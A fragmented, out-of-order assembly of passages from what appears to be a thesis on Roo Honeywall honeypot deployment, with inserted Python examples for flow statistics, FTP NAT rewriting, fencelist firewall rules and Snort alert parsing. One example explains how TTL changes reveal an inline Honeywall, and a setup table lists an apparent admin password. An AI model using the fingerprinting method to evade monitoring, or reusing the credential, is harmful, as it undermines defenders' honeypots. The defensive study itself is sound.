By randomly analyzing the flows without a triggered alert, it shows that most of the traffic was caused by connect scans (see also 5.3.2). Another type of flow without IDS alert seems to connect to the RPC management interface and drop the connection after success. It is likely an advanced type of scan for RPC services. Unfortunately, verifying this suggestion would require learning and understanding the specifications of Remote Procedure Calls. Further, it would be necessary to analyze the flows individually, compare the sent bytes to the original specification and check for deviations.

Analyzing the flows per IP shows that the "NETBIOS DCERPC ISystemActivator path overflow attempt little endian unicode" alert is preceded by a TCP connect scan and followed by such a susp

[18] Unfortunately no official reference for the use of these ports is available; only a website with a short description: http://msdn.microsoft.com/library/default.asp?url=/library/en-us/instsql/in_runsetup_7793.asp
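The numbers argued with above (flows per port, alerts per port, their ratio) and the per-port byte shares behind figure 5.24 come from the same kind of aggregation. The following Python is an added example, not a script from the thesis or from Walleye: it computes bytes per port, flows per port and the flow-to-alert ratio from flow and alert records, then lists the flows that raised no alert and, among those, the payload-less connect scans. All records are constructed; matching alerts to flows by (source, destination, port) is an assumption of this example and is coarser than the flow IDs Roo keeps.

```python
"""Per-port traffic statistics from flow and alert records (added example)."""

# Service names as in figure 5.24.
SERVICES = {
    135: "epmap", 137: "netbios-ns", 138: "netbios-dgm", 139: "netbios-ssn",
    445: "microsoft-ds", 53: "domain", 69: "tftp", 80: "http",
    6667: "ircd", 1433: "ms-sql-s", 1434: "ms-sql-m",
}

# Constructed flows: "bytes" is the payload the source sent within that flow.
FLOWS = [
    {"src": "203.0.113.7",   "dst": "192.168.10.49", "dport": 135, "bytes": 1088},
    {"src": "203.0.113.7",   "dst": "192.168.10.49", "dport": 135, "bytes": 0},
    {"src": "198.51.100.20", "dst": "192.168.10.49", "dport": 135, "bytes": 0},
    {"src": "198.51.100.20", "dst": "192.168.10.49", "dport": 135, "bytes": 0},
    {"src": "198.51.100.31", "dst": "192.168.10.49", "dport": 135, "bytes": 0},
    {"src": "198.51.100.31", "dst": "192.168.10.49", "dport": 445, "bytes": 0},
    {"src": "198.51.100.31", "dst": "192.168.10.49", "dport": 445, "bytes": 312},
    {"src": "203.0.113.7",   "dst": "192.168.10.49", "dport": 139, "bytes": 0},
]

# Constructed alerts in the shape of the one discussed in the text.
ALERTS = [
    {"src": "203.0.113.7", "dst": "192.168.10.49", "dport": 135,
     "msg": "NETBIOS DCERPC ISystemActivator path overflow attempt little endian unicode"},
]


def per_port_stats(flows, alerts):
    """Flows, bytes and alerts per destination port plus the flows-per-alert ratio."""
    stats = {}
    for f in flows:
        s = stats.setdefault(f["dport"], {"flows": 0, "bytes": 0, "alerts": 0})
        s["flows"] += 1
        s["bytes"] += f["bytes"]
    for a in alerts:
        stats.setdefault(a["dport"], {"flows": 0, "bytes": 0, "alerts": 0})["alerts"] += 1
    for port, s in stats.items():
        s["service"] = SERVICES.get(port, "unknown")
        s["flows_per_alert"] = s["flows"] / s["alerts"] if s["alerts"] else None
    return stats


def byte_share(stats):
    """Fraction of all bytes seen on each port (the quantity behind the bar chart)."""
    total = sum(s["bytes"] for s in stats.values())
    return {port: (s["bytes"] / total if total else 0.0) for port, s in stats.items()}


def flows_without_alert(flows, alerts):
    """Flows for which no alert with the same source, destination and port exists."""
    alerted = {(a["src"], a["dst"], a["dport"]) for a in alerts}
    return [f for f in flows if (f["src"], f["dst"], f["dport"]) not in alerted]


def connect_scans(flows):
    """Connect scans complete the handshake and close without sending any payload."""
    return [f for f in flows if f["bytes"] == 0]


if __name__ == "__main__":
    stats = per_port_stats(FLOWS, ALERTS)
    share = byte_share(stats)
    for port in sorted(stats, key=lambda p: stats[p]["flows"], reverse=True):
        s = stats[port]
        ratio = f"{s['flows_per_alert']:.1f}:1" if s["flows_per_alert"] else "no alerts"
        print(f"{port:>5} {s['service']:<13} flows={s['flows']} bytes={s['bytes']} "
              f"({share[port]:.0%}) alerts={s['alerts']} ratio={ratio}")
    quiet = flows_without_alert(FLOWS, ALERTS)
    print(f"{len(quiet)} flows without alert, {len(connect_scans(quiet))} of them connect scans")
```

With the constructed data port 135 shows five flows and one alert (5:1, as in the text) and six of the eight flows raised no alert, five of them without payload. On real Roo data the same functions would be fed from the flow and alert exports instead of the inline lists.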
...mation, including alerts of outbound activity and when a process has failed.
- Enable email alerts: Yes / No
- Email address
- Start email alerting on boot: Yes / No

4.3 Sebek packets from Honeypots
Honeypots will be sending Sebek packets over the network. We have to configure how the gateway will handle such packets. Often the default behavior is for the firewall to block the Sebek packets so they don't go past the gateway; however, the Snort process listening on eth1 will collect and archive the data. You also have the option of logging each Sebek packet to /var/log/messages (can become quite chatty).
- IP destination of Sebek packets (recommended: gateway of the honeypots)
- Default UDP port of Sebek packets
- Drop / Allow / Log Sebek packets

4.4 Hostname of gateway

5 Additional Setup
5.1 Sebek configuration (Windows 2000)
After installing Sebek (SebekSetup2K.exe), please make sure that you run the Configuration Wizard before rebooting:
- location of the Sebek driver file
- destination MAC
- destination IP
- destination port
- magic value
- NIC used by Sebek
- configuration program name
5.2 Fencelist
5.3 Blacklist
5.4 Whitelist

[figure: detailed stats of Roo Win2000. The table is rotated in the source; its values (averages per minute) are not recoverable.]
...me applications depend on the local IP address sent in the payload, e.g. FTP sends a PORT command (RFC 959) containing the local IP. Those applications require an Application Layer Gateway which rewrites the IP in the payload. Therefore the applications on the Honeypot are not aware of the public IP and are limited by the functionality of the intermediate network device.

3.5 Scenario V: risk assessment
A Honeypot allows external addresses to establish a connection. This means that packets from the outside are answered. Without a Honeypot there would be no such response. So a Honeypot increases traffic on purpose, especially traffic which is suspected to be malicious.

Security mechanisms need to make sure that this traffic does not affect the production systems. Moreover, the amount of traffic needs to be controlled. A hacker could use the Honeypot to launch a DoS or DDoS attack. Another possibility would be to use the Honeypot as a file server for stolen software, in hacker terms called warez. Both cases would increase bandwidth usage and slow down production traffic. As hacking techniques evolve, an experienced Blackhat could launch a new kind of attack which is not recognized automatically. It could be possible to bypass the controlling functions of the Honeypot and misuse it. Such activity could escalate the operation of a Honeypot and turn it into a severe threat. A Honeypot operator needs to
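The FTP case from the beginning of this section, worked through in Python as an added example that is not part of the thesis: build_port_command() emits the PORT line as an FTP client on the NATed Honeypot would, carrying its private address (RFC 959 encodes the port as p1*256 + p2), and alg_rewrite() does the job of an Application Layer Gateway on the NAT device: detect the private address in the payload, replace it with the public one and hand back the port mapping the NAT must install so that the server's data connection reaches the Honeypot. Addresses, ports and the public port 40000 are constructed; real ALGs allocate that port from a pool.

```python
"""FTP PORT command through NAT: what the Honeypot sends and what an ALG rewrites (added example)."""
import re

PORT_RE = re.compile(r"^PORT (\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3})\r?$")


def build_port_command(ip, port):
    """PORT line as an FTP client emits it for an active-mode data connection (RFC 959)."""
    h1, h2, h3, h4 = ip.split(".")
    return f"PORT {h1},{h2},{h3},{h4},{port // 256},{port % 256}\r\n"


def parse_port_command(line):
    """(ip, port) from a PORT line, or None if the line is not a PORT command."""
    m = PORT_RE.match(line.rstrip("\n"))
    if not m:
        return None
    fields = [int(x) for x in m.groups()]
    if any(f > 255 for f in fields):
        raise ValueError(f"field out of range in {line!r}")
    return ".".join(str(f) for f in fields[:4]), fields[4] * 256 + fields[5]


def alg_rewrite(line, private_ip, public_ip, public_port):
    """Rewrite a PORT line that carries the private address.

    Returns (line to forward, mapping or None). The mapping
    (public_ip, public_port, private_ip, private_port) is what the NAT device
    must install so that the server's inbound data connection is translated
    back to the Honeypot. Non-PORT lines and PORT lines with a foreign
    address are forwarded unchanged."""
    parsed = parse_port_command(line)
    if parsed is None or parsed[0] != private_ip:
        return line, None
    private_port = parsed[1]
    return (build_port_command(public_ip, public_port),
            (public_ip, public_port, private_ip, private_port))


if __name__ == "__main__":
    honeypot, nat_public = "192.168.10.49", "203.0.113.5"
    line = build_port_command(honeypot, 1043)
    print("Honeypot sends:", line.strip())      # private address: a server on the internet cannot connect back
    rewritten, mapping = alg_rewrite(line, honeypot, nat_public, 40000)
    print("ALG forwards:  ", rewritten.strip())
    print("NAT mapping:   ", mapping)
```

Without the ALG the server receives "PORT 192,168,10,49,4,19" and tries to open a data connection to an RFC 1918 address that is not routed on the internet, so the transfer fails silently from the Honeypot's point of view. Note also that the rewritten line can differ in length from the original, so a real ALG has to adjust TCP sequence and acknowledgement numbers for the rest of the control connection.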
...n shows an example of a test case template.
Purpose describes the test's necessity.
Setup / Precondition states what is needed to run this test. In this example a stopwatch is needed.
Execution lists the detailed steps to perform this test and allows reviewed results to be marked as passed or failed.
Expected results is the verification list for the underlying test.
Results summary is used to capture metadata of the test such as date, time, name of the tester, status of the test, and a field for remarks and comments. The test case template provides three lines of metadata in case a test failed in the first attempt and succeeded in a later run.

3.1 Test Case 1: time and date
3.1.1 Purpose
Verify that requirement R001 has been satisfied and attacker, Honeypot and Honeywall are set with the correct time and date.
3.1.2 Setup / Precondition
The basic setup has been done (see section 1.2). This test requires a watch.
3.1.3 Execution
1. Check time and date on the Honeywall by entering "date".
2. Verify that the time corresponds to your chosen time. Pass / Fail
3. Check time and date on the Honeypot (Windows 2000/XP) by entering "date" and "time".
4. Verify that the time corresponds to your chosen time. Pass / Fail
5. Check time and date on the Honeypot en
...nitialize Drive
This wipes your drive and prepares it for the Honeywall installation. You will have to do this if you want to proceed. All data on the hard drive is lost during the initialization process.
1.2 Initial Setup Method
How do you want to proceed with the configuration?
- Floppy: use the honeywall.conf file from floppy for configuration
- Defaults: setup from factory defaults (/etc/honeywall.conf.orig)
- Interview: go through and answer a series of questions to configure your Honeywall
1.3 Firewall Mode
- Bridge (default): layer two bridging gateway
- NAT: layer three routing gateway
1.4 Honeypot Public IP Addresses
Space-delimited list of your honeypots' IPs within your Honeynet. If you are doing NAT, then this is the list of the public or external IP addresses.
- IP addresses
1.5 CIDR Notation
- network prefix
- network
1.6 Broadcast address of Honeypots
- broadcast addresses

2 Second Section
2.1 Configure management interface
- NIC to use for the management interface
- IP address of the management interface
- network mask of the management interface
- default gateway of the management interface
- DNS domain for the management interface
- DNS server for the management interface
- Activate interface now: Yes / No
- Activate interface on reboot: Yes / No
2.4 Configure SSH daemon on gateway (listens on eth2)
- port listening on
- Allow root login (default is no): Yes / No
2.5 Add user
...nter the IP according to the remote management network range.

[figure 6: VMnet8 settings. Screenshot of the Windows dialog "Properties of VMware Network Adapter VMnet8" (tabs General / Authentication / Advanced). Connect using: VMware Virtual Ethernet Adapter for VMnet8. This connection uses the following items: Client for Microsoft Networks; VMware Bridge Protocol; File and Printer Sharing for Microsoft Networks; Internet Protocol (TCP/IP). Buttons: Install, Uninstall, Properties. Description: Allows access to resources in a Microsoft network. Options: Show icon in notification area when connected; Notify me when this connection has limited or no connectivity.]

6. Deactivate the Windows firewall.
Now you can boot Roo.

[figure 7: Roo started. Screenshot of VMware Workstation running the virtual machine "roo 134"; the status bar reports "You do not have VMware Tools installed".]
...nternet Engineering Task Force, 1987.
[RFC 1035] P. V. Mockapetris: Domain names, Implementation and specification, Request for Comments 1035, The Internet Engineering Task Force, 1987.
[RFC 1122] R. Braden (ed.): Requirements for Internet Hosts, Communication Layers, Request for Comments 1122, The Internet Engineering Task Force, 1989.
[RFC 1350] K. Sollins: The TFTP protocol (revision 2), Request for Comments 1350, The Internet Engineering Task Force, 1992.
[RFC 1459] J. Oikarinen, D. Reed: Internet Relay Chat Protocol, Request for Comments 1459, The Internet Engineering Task Force, 1993.
[RFC 1700] J. Reynolds, J. Postel: Assigned Numbers, Request for Comments 1700, The Internet Engineering Task Force, 1994.
[RFC 1918] Y. Rekhter et al.: Address Allocation for Private Internets, Request for Comments 1918, The Internet Engineering Task Force, 1996.
[RFC 2030] D. Mills: Simple Network Time Protocol (SNTP) Version 4, Request for Comments 2030, The Internet Engineering Task Force, 1996.
[RFC 2616] R. Fielding et al.: Hypertext Transfer Protocol, HTTP/1.1, Request for Comments 2616, The Internet Engineering Task Force, 1999.
[SNIA 02] [Sourcefire 05] [Spitzner 02] [Stoll 90] [Upnp 00] [Wikip 05] [Yegneswaran 04]
[RFC 3232] J. Reynolds (ed.): Assigned Numbers: RFC 1700 is Replaced by an On-line Database, Request for Comments 3232, The Internet Engineering Task Force, 2002.
[Schneier 00] Bruce Schneier: Secrets and Lies, John Wil
...ontrolling mechanism; hence this type of control needs to read every packet, decide if it is permitted and either drop or forward it. A firewall seems to be an adequate solution for this case. Firewalls typically work on layer 3 [OSI 94]. During the transmit process the IP header is rewritten: the time-to-live field is decremented, the MAC address is changed and the header checksum is recalculated. An advanced intruder could detect those changes and fingerprint the Honeywall, which would make the Honeypot fairly uninteresting, or even worse, the attacker would attack the Honeywall.

Note: a hub typically works on layer 1 [OSI 94]. All packets are visible on each port; therefore a device can capture all traffic directed to the other ports.

3.6.3 Analyzability
This research was based on IPv4. Conclusions and comparisons could be made towards the newer version IPv6, but they are not part of this research. The collected data on a Honeypot shows what happened on the wire: scans, intrusion attempts, worm propagation and other malicious activities. After dumping the packets into an analysis tool, the investigator is confronted with an enormous amount of data. A method is needed to weed out the informative data from the useless traffic (see 5.3 for log analysis). TCP connections are easy to track: they provide a sequence number which assigns each packet to a corresponding flow. Packets need to be ga
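The fingerprinting risk described for a layer-3 Honeywall can be made visible with plain IP header arithmetic. The following Python is an added example, not code from the thesis: it builds an IPv4 header, forwards it once as a layer-2 bridge (untouched, as Roo does in bridge mode) and once as a layer-3 router (TTL decremented, checksum recomputed), and estimates from the TTL seen at the receiver how many routing hops the packet crossed. Two hosts on the same segment should see zero hops between them; a hop that the known topology cannot explain gives away an inline device. The MAC rewrite is not modeled, and all addresses are constructed.

```python
"""IPv4 forwarding as a bridge and as a router, and what the receiver can tell apart (added example)."""
import struct


def inet(ip):
    """Dotted-quad string to 4 network-order bytes."""
    return bytes(int(x) for x in ip.split("."))


def ip_checksum(header):
    """RFC 791 header checksum: one's-complement sum of 16-bit words, complemented."""
    if len(header) % 2:
        header += b"\x00"
    total = sum(struct.unpack(f"!{len(header) // 2}H", header))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_ipv4(src, dst, ttl, proto=1, payload=b"", ident=0x1234):
    """Minimal 20-byte IPv4 header (no options) plus payload, checksum filled in."""
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload), ident, 0,
                      ttl, proto, 0, inet(src), inet(dst))
    hdr = hdr[:10] + struct.pack("!H", ip_checksum(hdr)) + hdr[12:]
    return hdr + payload


def bridge_forward(pkt):
    """A layer-2 bridge relays the IP packet unchanged: nothing for the receiver to notice."""
    return pkt


def router_forward(pkt):
    """A layer-3 device decrements TTL and must recompute the checksum; TTL 0 is dropped."""
    ttl = pkt[8] - 1
    if ttl <= 0:
        return None
    hdr = pkt[:8] + bytes([ttl]) + pkt[9:10] + b"\x00\x00" + pkt[12:20]
    hdr = hdr[:10] + struct.pack("!H", ip_checksum(hdr)) + hdr[12:]
    return hdr + pkt[20:]


def header_valid(pkt):
    """A correct header sums to zero when the checksum field itself is included."""
    return ip_checksum(pkt[:20]) == 0


def ttl_hops(observed_ttl, initial_ttls=(64, 128, 255)):
    """Assume the nearest common initial TTL (Linux 64, Windows 128, others 255);
    the difference is the number of routing hops the packet has crossed."""
    for initial in initial_ttls:
        if observed_ttl <= initial:
            return initial - observed_ttl
    return None


if __name__ == "__main__":
    # Honeypot (Windows, initial TTL 128) answers the attacker on the same /24.
    echo = build_ipv4("192.168.10.49", "192.168.10.3", 128, payload=b"ping")
    via_bridge = bridge_forward(echo)
    via_router = router_forward(echo)
    print("bridge: TTL", via_bridge[8], "hops", ttl_hops(via_bridge[8]), "valid", header_valid(via_bridge))
    print("router: TTL", via_router[8], "hops", ttl_hops(via_router[8]), "valid", header_valid(via_router))
```

Both packets carry valid checksums, so the router's rewrite is not an error the receiver can detect; what it can detect is a TTL of 127 arriving from a host that is supposed to be one Ethernet segment away. The same reasoning applies to the changed source MAC, which a bridge also leaves intact.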
...or release Roo 1.0_b139 is installed on a clean system. The Honeywall, a Honeypot and a client computer with a standard operating system installation (e.g. Windows XP SP2) are required for this test. The client computer will be referred to as the attacker in this document.
- The internal network provides a connection to the internet.
- Settings for using the internet are applied on the Honeypot and the attacker.
- If a network range or a single IP with restricted access for the Honeypot is assigned, it will be referred to as blIP for a single address or as blRange for a network range.
1.4 Honeywall setup
The Honeywall needs to be set up with three network cards (NICs). The Honeywall mode needs to be set to bridge for this test plan. The management NIC needs an IP which will be referred to as manIP in this document. The IP of the Honeypot will be referred to as hpIP and the attacker's IP as attIP.

2 Requirements
The requirements listed here are described in the document "Improving network security with Honeypots". That paper explains the need for each requirement, gives an example why it is necessary and also shows how an error could be repaired. It is recommended to be familiar with the requirements section of that paper.
R001 Time and date are set
R002 Time intervals are normal
R003 Honeypot should be able
R004 R005 R006 R007 R008 R009 R010 R011 R012
...ot reloaded, the firewall rules are not created. When creating the file, the fencelist has to be reloaded.
Attain: Apply the fencelist settings. Create /etc/fencelist.txt with entries of endangered addresses, then reload it using menu: choose 4 (Honeywall Configuration), then 11 (Outbound Fence List) and finally 3 (Enable/Reload Fence List).
The fencelist is the most important tool for securing production networks. Its application creates rules on the firewall which block all traffic to the specified targets.

R007 Honeywall is logging traffic (from R001)
Need: Ensure that the logging capabilities are working.
Ex: The Snort process could not have been started or has failed.
Attain: Open menu, choose 3 (Honeywall Administration) and then 6 (Reload Honeywall).
Roo uses Snort (see 4.4.1) to capture traffic. Here we focus on basic packet capture, which means that this is dependent on Snort's capture files.

R008 Walleye is activated
Need: Walleye (see 4.4.1) provides graphical data analysis and is used to quickly analyze flows.
Ex: It is possible that the remote management interface has been configured with a wrong IP or that the Apache httpd daemon failed for some reason. Also it is important to see whether the login is successful and user and password are working. It is possible that Walleye does not restart after wiping the logging directories.
Attain: Open menu
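To make the effect of R006 concrete, here is an added Python example; it is not the Honeywall's own rc.firewall, and the rule layout Roo actually generates may differ. It reads a fencelist in the /etc/fencelist.txt format (one address or CIDR range per line, comments and blank lines ignored; the sample list is constructed), produces the iptables commands that drop traffic from the Honeypot to every listed target, and models the decision those rules implement so that the "created but not reloaded" pitfall described above is visible: before reload() nothing is blocked. The chain name FENCE and the FORWARD hook are assumptions.

```python
"""Fencelist to firewall rules (added example, not the Honeywall's rc.firewall)."""
import ipaddress

# Constructed fencelist: production hosts the Honeypot must never reach.
SAMPLE_FENCELIST = """# production servers (constructed example)
192.168.20.0/24
10.1.2.3            # accounting database

172.16.0.0/12
"""


def parse_fencelist(text):
    """Return the listed networks; a bare host address becomes a /32."""
    nets = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if line:
            nets.append(ipaddress.ip_network(line, strict=False))
    return nets


class Fence:
    """Outbound fence: blocks Honeypot -> fenced target and nothing else."""

    def __init__(self, honeypots):
        self.honeypots = {ipaddress.ip_address(h) for h in honeypots}
        self.nets = []      # empty until reload(): a file on disk alone creates no rules

    def reload(self, fencelist_text):
        """What 'Enable/Reload Fence List' has to do after the file was written."""
        self.nets = parse_fencelist(fencelist_text)

    def rules(self, chain="FENCE"):
        """iptables commands equivalent to the loaded fencelist (chain name assumed)."""
        cmds = [f"iptables -N {chain}", f"iptables -F {chain}",
                f"iptables -I FORWARD 1 -j {chain}"]
        for hp in sorted(self.honeypots):
            for net in self.nets:
                cmds.append(f"iptables -A {chain} -s {hp} -d {net} -j DROP")
        cmds.append(f"iptables -A {chain} -j RETURN")
        return cmds

    def allows(self, src, dst):
        """Decision the rules implement for one forwarded packet."""
        src, dst = ipaddress.ip_address(src), ipaddress.ip_address(dst)
        return not (src in self.honeypots and any(dst in n for n in self.nets))


if __name__ == "__main__":
    fence = Fence(["192.168.10.49"])
    print("before reload, Honeypot -> 10.1.2.3 allowed:", fence.allows("192.168.10.49", "10.1.2.3"))
    fence.reload(SAMPLE_FENCELIST)
    print("\n".join(fence.rules()))
    print("after reload, Honeypot -> 10.1.2.3 allowed: ", fence.allows("192.168.10.49", "10.1.2.3"))
```

The fence is deliberately one-directional: traffic from the attacker towards the production network is not its business (that is what the production firewall is for), and the Honeypot's other outbound traffic stays allowed, subject to the connection limits the Honeywall applies separately.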
...pot 192.168.10.49
figure 4.2: setup at Mühltal

The local network range is 192.168.10.0/24 and is connected via a NAT router to the internet. All public ports on the router are statically mapped to the Honeypot's IP address. No firewall rules are applied. Therefore we have a combination of the following scenarios:
- the unprotected-environment scenario, due to the complete forwarding of ports and the absence of firewall rules;
- Scenario IV (private address), due to the address range of the local network and the use of a NAT router.

Setup of Honeypot and Honeywall:
                  Honeypot                                   Honeywall
CPU               Celeron 333 MHz                            Pentium III 500
Hard disk
Chipset           Intel BX                                   Intel BX
NIC 1             3Com 3c900 combo                           3Com 3c590
Password          blank                                      PERF admin
Software / OS     Windows 2000 Build 2195 or                 Roo 1.0 hw 139
                  Windows XP Build 2600 (xpsp2_gdr.050301-1519)
Installed fixes   no Service Packs or Hotfixes installed     n/a
figure 4.3: setup Honeypot Mühltal

4.3.2 Setup at FH Darmstadt (Roo_da, Roo_die)
At first it was planned to install the Honeypot at the Master Project Lab at Darmstadt. But some preliminary tests showed that the firewall rules did not allow any external traffic for this location: the only packets seen were broadcast messages, and none was directly targeting the Honeypot. Thus the experiment was moved to a DMZ network with l
...ppearing on the list. A modification to snort_inline could make it possible to drop flows when they match the pattern of a long-known attack. This would keep the point of attack, the vulnerability, open and allow other attacks to compromise the Honeypot. Of course it is also possible to close the vulnerability on the Honeypot by applying a patch, but in this case the Honeynet would not capture attacks other than the ones already known. Many attacks on the Honeynet were successful in launching an exploit but did not succeed in downloading their binary. Sometimes this was due to the outbound limit of the Honeywall; in other cases it is not obvious why it failed. An improved filter should offer the following:
- filter and categorize by attacks
- show a list of attacks and count their appearances

6.2 Conclusion
Regarding the experiments, several results were expected. In general the Honeypots should provide data which shows what attacks were used at the time of capture. The data was expected to show which techniques were used and how they were used to gain access to the Honeypot. As the Honeypot was installed with Windows operating systems, results concerning specific information about threats on Windows platforms were expected. In particular, most of the traffic to the Honeypot was expected to target only a handful of vulnerable ports. This was due to the default open ports on Windows p
...ptures of a Honeynet we can see certain patterns: patterns of scans, patterns of code and, combining both, patterns of attacks. Going further, it is possible to separate a single binary of a worm and let it run alone. Doing this, we can analyze the exact behavior of this individual threat. Another pool of knowledge is the pattern of the scans a worm usually performs. When launching its propagation routine, worms usually scan random addresses to distribute their malicious code. Those scans follow a recognizable pattern. Depending on the worm, that pattern can differ, which means that the scan detection engine of an IDS might not yet know this pattern. Using the information gained from the worm test it is possible to train the IDS so that it will detect further scans.

3.7.2 Teaching others
"To learn the tools, tactics and motives involved in computer and network attacks, and share the lessons learned" [Honeynet 05]. This is the slogan of the Honeynet Project. It is a very good reason for the use of a Honeynet. Internet threats become better understood and people become more and more aware of the dangers of a worldwide network. This helps reduce the number of attacks and the waste of bandwidth caused by attacks. During my experiments I found that there are still a large number of worms using long-known vulnerabilities. In most cases there is even a patch available bu
...re is higher, which makes the use of medium-interaction Honeypots more risky.

2.4.3 High-interaction Honeypots
These are the most elaborate Honeypots. They either emulate a full operating system or use a real installation of an operating system with additional monitoring. High-interaction Honeypots are used primarily as research Honeypots, but can also serve as production Honeypots. As they offer a full operating system, the risk involved is very high: an intruder could easily use the compromised platform to attack other devices in the network or cause bandwidth losses by creating enormous traffic.

2.5 Types of attacks
There are a lot of attacks on networks, but there are only two main categories of attacks.

2.5.1 Random attacks
Most attacks on the internet are performed by automated tools. Often used by unskilled users, the so-called script kiddies (see 2.1), they search for vulnerabilities or already installed backdoors (see introduction). This is like walking down a street and trying to open every car by pulling the handle: by the end of the day at least one car will be found unlocked. Most of these attacks are preceded by scans of the entire IP address range, which means that any device on the net is a possible target.

2.5.2 Direct attacks
A direct attack occurs when a Blackhat wants to break into a system of choice, such as an eCommerce web server conta
97. rements are built for a setup with the Honeynet Project's tool Roo. The current version these requirements are verified for is Roo 1.0.hw-139. Other versions or different products may have the same requirements, but some requirements are vendor specific, such as R012 (Sebek is running). When creating test cases for other versions or products they should follow the same template as given in 5.1.1. Requirements should make sure that all security functions are covered and that the analysis features are working, especially over dedicated periods, to ensure stable operation.

R001 Time and date are set
Need: Time and date need to be set in order to relate recorded connections to the time of their appearance.
Ex: A Honeypot was up for one week and a successful compromise occurred. But due to a wrongly set clock it is not clear when it happened. It could have been at the beginning of the week, when the old firewall rules were in place, or at the end, after the firewall administrator had installed the new policy on the firewall. The value of the attack's data is degraded if the correct time is not known: the question whether the new firewall rules improved security or opened new vulnerabilities cannot be answered.
Attain: Log in to the console with privileges to change the time, and set date and time.
With this firewall example one can see how important correct time is. Even with evidence of an attack, its value is not the same as it would be with the correct time of occurrence.
98. removing the protocol binding in the properties of the VMware network adapter. A setup instruction sheet was prepared to ensure repeatability (see B.3). The use of VMware offers several important advantages:
- it saves money for hardware;
- a complete Honeynet can be run on one machine;
- saving the state of an installation is reduced to copying the files of the virtual machine;
- it is portable, i.e. on a laptop.
(Footnote: DMZ, Demilitarized Zone: an intermediate network between the internet and the production network, often used to place servers which offer web based services, i.e. a web server or mail server.)
However, VMware needs powerful hardware, especially when two virtual machines are supposed to run at the same time. Fortunately the Barebone with Intel Pentium IV and 1 GB is suitable for this purpose. Figure 5.3 shows the setup at FHD. VMware Workstation is installed on the host computer (Barebone with one network card and 1 GB memory). The host operating system is Windows XP. Honeywall and Honeypot are installed in virtual machines. Due to the decision not to connect the management interface to the internet, the data can only be read at the location of the setup. This decision was made because a reachable management interface would pose an unquantifiable risk to the experiment: it might be possible to hack the web interface and thereby gain access to the Honeywall itself. Permitting access to the management interface from
99. rets. The Honeypot operator gains knowledge about the Blackhat's tools and tactics. When a system has been compromised the administrators usually find the tools used by the attacker, but there is no information about how they were used. A Honeypot gives a real live insight into how the attack happened.

2.3.4 Honeynets
Honeynets extend the concept of single Honeypots to a network of Honeypots. As said in 2.3.1, the classical Honeypot deployment consists of one Honeypot placed within a production network. It is possible to deploy more than one Honeypot, but each of these is a stand alone solution and according to the concept it is still a single machine. Deploying a Honeynet requires at least two devices: a Honeypot and the Honeywall. In that scenario the attacker is given a Honeypot with a real operating system. This means he can fully access and mangle it. Through that possibility an attacker could easily attack other systems or launch a denial of service attack. To reduce this risk a firewall is configured on the Honeywall which limits the outbound connections. Access to the production network is completely restricted. The Honeywall also maintains an Intrusion Detection System which monitors and records every packet going to and from the Honeypot. The Honeynet Project defines two Honeynet architectures: Gen I (first generation) and Gen II (second generation) [Honeynet 04]. The Gen I architecture is the first solution of this type and not capable
100. (end of table) trojan-activity: A Network Trojan was detected; denial-of-service: Detection of a Denial of Service Attack; unusual-client-port-connection: A client was using an unusual port (medium); string-detect: A suspicious string was detected.
figure 5.10: Snort classtypes
The third line of the alert shows date, time, source and destination IP. In the fourth line Snort prints the transport protocol used (here TCP) and details of the IP header; the fifth line continues with the TCP header. Unset TCP flags are displayed as asterisks, a set flag is indicated by a letter. Here "AP" means that the acknowledgement (ACK) and push (PSH) flags are set. Walleye, the web interface of Roo, displays the flows in a clear overview and also shows the description of Snort alerts if any were detected. Further to this it prints a packet count and tries to guess the operating system. The left pane is used for filtering: the output can be limited to months, days and hours, and there are filters by protocol, source, etc.

[Walleye connection view (Data Analysis, June 2005), figure residue. Filter: connections after Sun Jun 19 14:00:00 2005 and before Sun Jun 19 14:59:59 2005. First row: June 19th 14:02:12, duration 00:00:05, 1 alert NETBIOS SMB-DS IPC$ unicode share access, 84.58.142.230 → 192.168.10.39, unknown signature, TCP source port 3416, 8 kB / 20 pkts out
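The alert layout described above, as an added example that is not part of the thesis: a parser for Snort's full alert format that decodes the eight-character flag string, where an asterisk marks an unset flag. The alert text inside the block is constructed in that layout; its SID, classification, TTL, ID and sequence numbers are invented values chosen to match the first flow of the Walleye view (84.58.142.230:3416 to 192.168.10.39:445), and the flag positions follow Snort 2.x output (two reserved bits, then URG, ACK, PSH, RST, SYN, FIN).

```python
"""Added example, not from the thesis: parse one Snort full-format alert and
decode its TCP flag string. SAMPLE_ALERT is constructed for this example."""
import re
from typing import Dict, Set

# Snort prints TCP flags as a fixed 8-character string: reserved bit 1 (CWR),
# reserved bit 2 (ECE), then URG ACK PSH RST SYN FIN. '*' means not set,
# so "***AP***" is ACK+PSH.
_FLAG_NAMES = ("CWR", "ECE", "URG", "ACK", "PSH", "RST", "SYN", "FIN")


def decode_tcp_flags(flag_str: str) -> Set[str]:
    if len(flag_str) != 8:
        raise ValueError(f"expected 8-character flag string, got {flag_str!r}")
    return {name for ch, name in zip(flag_str, _FLAG_NAMES) if ch != "*"}


_HDR_RE = re.compile(r"^\[\*\*\] \[(\d+):(\d+):(\d+)\] (.+?) \[\*\*\]$")
_CLS_RE = re.compile(r"^(?:\[Classification: (.+?)\] )?\[Priority: (\d+)\]$")
_ADDR_RE = re.compile(
    r"^(\d\d/\d\d)-(\d\d:\d\d:\d\d\.\d+) (\S+?)(?::(\d+))? -> (\S+?)(?::(\d+))?$")
_IP_RE = re.compile(
    r"^(TCP|UDP|ICMP) TTL:(\d+) TOS:(\S+) ID:(\d+) IpLen:(\d+) DgmLen:(\d+)( DF)?")
_TCP_RE = re.compile(
    r"^(\S{8}) Seq: (0x[0-9A-Fa-f]+)\s+Ack: (0x[0-9A-Fa-f]+)\s+"
    r"Win: (0x[0-9A-Fa-f]+)\s+TcpLen: (\d+)")


def parse_snort_alert(text: str) -> Dict[str, object]:
    """Turn one full-format alert into a dict. Raises ValueError when a line
    does not match the layout, so garbage never silently becomes an event."""
    lines = [l.strip() for l in text.strip().splitlines() if l.strip()]
    if len(lines) < 3:
        raise ValueError("too few lines for a full-format alert")
    m = _HDR_RE.match(lines[0])
    if not m:
        raise ValueError(f"bad header line: {lines[0]!r}")
    alert: Dict[str, object] = {
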